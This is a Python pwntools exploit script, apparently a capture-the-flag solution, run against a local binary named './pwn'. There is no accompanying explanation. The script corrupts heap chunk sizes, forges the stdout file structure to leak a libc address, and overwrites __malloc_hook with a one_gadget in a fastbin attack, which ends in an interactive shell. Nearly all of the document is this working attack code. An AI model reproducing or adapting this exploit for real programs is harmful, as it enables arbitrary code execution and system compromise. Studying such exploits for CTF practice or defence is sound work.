1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89
|
from pwn import *
context.terminal = ['tmux','splitw','-v'] context.log_level = 'debug'
io = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') elf = ELF('./pwn') one = [0x45226,0x4527a,0xf0364,0xf1207]
def add(idx,size,con,ch=1): if ch == 1: io.sendlineafter('>>>\n','1') io.sendlineafter('idx:\n',str(idx)) io.sendlineafter('len:\n',str(size)) io.sendafter('content:\n',con) else: io.sendlineafter('>>>','1') io.sendlineafter('idx:',str(idx)) io.sendlineafter('len:',str(size)) io.sendafter('content:',con)
def dele(idx,ch=1): if ch == 1: io.sendlineafter('>>>\n','2') io.sendlineafter('idx:\n',str(idx)) else: io.sendlineafter('>>>','2') io.sendlineafter('idx:',str(idx))
def writeSize(byte): dele(1) add(1,0x18,0x18*'A'+byte)
def writeSize2(byte): dele(1,2) add(1,0x18,0x18*'A'+byte,2)
add(0,0x28,'aaa') add(1,0x18,'aaa') add(2,0x68,'aaa') add(3,0x58,'bbb') add(4,0x10,'bbb')
dele(2) dele(0) add(0,0x28,0x28*'A'+p8(0xf1))
dele(1) add(1,0x18,'bbb') add(5,0xc0,'\xdd\xa5')
writeSize('\x71')
add(6,0x68,'junk')
writeSize('\xd1') add(7,0x68,51*'\x00'+p64(0xfbad1800)+p64(0)*3+'\x48')
libc_base = u64(io.recv(6).ljust(8,'\x00')) -3954339 log.success('libc:'+hex(libc_base)) malloc_hook = libc_base + libc.sym['__malloc_hook']
writeSize2('\x71')
io.sendline('2') io.sendlineafter('idx:','6')
dele(0,2) add(0,0x28,0x28*'A'+'\xf1',2) dele(1,2) add(1,0x18,'aaa',2) add(5,0xc0,p64(malloc_hook-0x23),2) writeSize2('\x71') add(6,0x68,'junk',2) writeSize2('\xd1')
add(8,0x68,0x13*'\x00'+p64(one[3]+libc_base),2)
io.sendlineafter('>>>','1') io.sendlineafter('idx:','9') io.sendlineafter('len:','16') io.interactive()
|